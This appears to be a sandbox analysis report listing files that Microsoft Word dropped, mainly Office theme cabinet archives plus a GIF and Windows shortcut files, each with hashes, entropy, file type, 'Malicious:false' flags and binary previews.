                                                                                                                                                                                                                                                                SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                                                                                                                                                                SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):698244
                                                                                                                                                                                                                                                                Entropy (8bit):7.997838239368002
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                                                                                                                                                                MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                                                                                                                                                                SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                                                                                                                                                                SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                                                                                                                                                                SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1065873
                                                                                                                                                                                                                                                                Entropy (8bit):7.998277814657051
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                                                                                                                                                                MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                                                                                                                                                                SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                                                                                                                                                                SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                                                                                                                                                                SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):953453
                                                                                                                                                                                                                                                                Entropy (8bit):7.99899040756787
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                                                                                                                                                                MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                                                                                                                                                                SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                                                                                                                                                                SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                                                                                                                                                                SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1097591
                                                                                                                                                                                                                                                                Entropy (8bit):7.99825462915052
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                                                                                                                                                                MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                                                                                                                                                                SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                                                                                                                                                                SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                                                                                                                                                                SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1310275
                                                                                                                                                                                                                                                                Entropy (8bit):7.9985829899274385
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                                                                                                                                                                MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                                                                                                                                                                SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                                                                                                                                                                SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                                                                                                                                                                SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1766185
                                                                                                                                                                                                                                                                Entropy (8bit):7.9991290831091115
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                                                                                                                                                                MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                                                                                                                                                                SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                                                                                                                                                                SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                                                                                                                                                                SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1881952
                                                                                                                                                                                                                                                                Entropy (8bit):7.999066394602922
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                                                                                                                                                                                                MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                                                                                                                                                                SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                                                                                                                                                                SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                                                                                                                                                                SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2591108
                                                                                                                                                                                                                                                                Entropy (8bit):7.999030891647433
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                                                                                                                                                                MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                                                                                                                                                                SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                                                                                                                                                                SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                                                                                                                                                                SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2527736
                                                                                                                                                                                                                                                                Entropy (8bit):7.992272975565323
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                                                                                                                                                                MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                                                                                                                                                                SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                                                                                                                                                                SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                                                                                                                                                                SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):663
                                                                                                                                                                                                                                                                Entropy (8bit):5.949125862393289
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                                                                                                                MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                                                                                                                SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                                                                                                                SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                                                                                                                SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):30
                                                                                                                                                                                                                                                                Entropy (8bit):1.2389205950315936
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:XaJlt:KJ
                                                                                                                                                                                                                                                                MD5:14F5019F408740F708027A080A5F8B69
                                                                                                                                                                                                                                                                SHA1:09FE039D6B7F62B75610315EFB6E1C8578BACC57
                                                                                                                                                                                                                                                                SHA-256:131AF3FDB3D9BC1D9A1D74DD8CDBE0B836F559B234912CA62A7CD827BC3D0DC7
                                                                                                                                                                                                                                                                SHA-512:90276B7C1939D928D9F5C9C3517DC56FE1737646B54DAF1D16A2F0C7DE9527A71230153B96DB0C71242C5C45CA8407079351107DF05597FAA4EB268C81BB68C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.... .........................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Mon Aug 12 12:22:36 2024, mtime=Mon Aug 12 12:23:40 2024, atime=Mon Aug 12 12:22:52 2024, length=0, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1164
                                                                                                                                                                                                                                                                Entropy (8bit):4.682512865734998
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:8F8aGBVIjvMd6jUnWx8CQAAmuTqTzLqyFm:8FIBVwMcUnWxbduTgqyF
                                                                                                                                                                                                                                                                MD5:F64BAF61DF9A1DB1B019B31CC23336E3
                                                                                                                                                                                                                                                                SHA1:60A4589C596ACB09A53BDAAA9A7D661181DCC3D0
                                                                                                                                                                                                                                                                SHA-256:088B062CA62F53B803793482AFC5EB05C5C7844A4CEEBEF1DF2701F8B66E7C89
                                                                                                                                                                                                                                                                SHA-512:E7915755FE248CFD5961542030442C63C8A656EFCC271E9F94D61B374192176E1C0F8BAEBD83EC558CD1E48D673913ADD2D6507CC4231E9E6D82E6310DC325F8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:L..................F..........l............,;.............................[....P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.Y.j....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1......Y.j..user.<......CW.^.Y.j..........................g...j.o.n.e.s.....V.1.....CW.^..AppData.@......CW.^.Y.j...........................%..A.p.p.D.a.t.a.....V.1......Y.j..Roaming.@......CW.^.Y.j..........................L..R.o.a.m.i.n.g.....\.1......Y.j..MICROS~1..D......CW.^.Y.j..........................*...M.i.c.r.o.s.o.f.t.....\.1......Y.j..TEMPLA~1..D.......Y.j.Y.j..........................^...T.e.m.p.l.a.t.e.s.......a...............-.......`............F.......C:\Users\user\AppData\Roaming\Microsoft\Templates........\.....\.T.e.m.p.l.a.t.e.s...........................>.e.L.:..er.=....`.......X.......035347...........hT..CrF.f4... .xA...X...,.......hT..CrF.f4... .xA...X...,..................1SPS.XF.L8C....&.m.q............/...S
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 4 11:02:34 2023, mtime=Mon Aug 12 12:22:40 2024, atime=Mon Aug 12 12:22:34 2024, length=15589, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):550
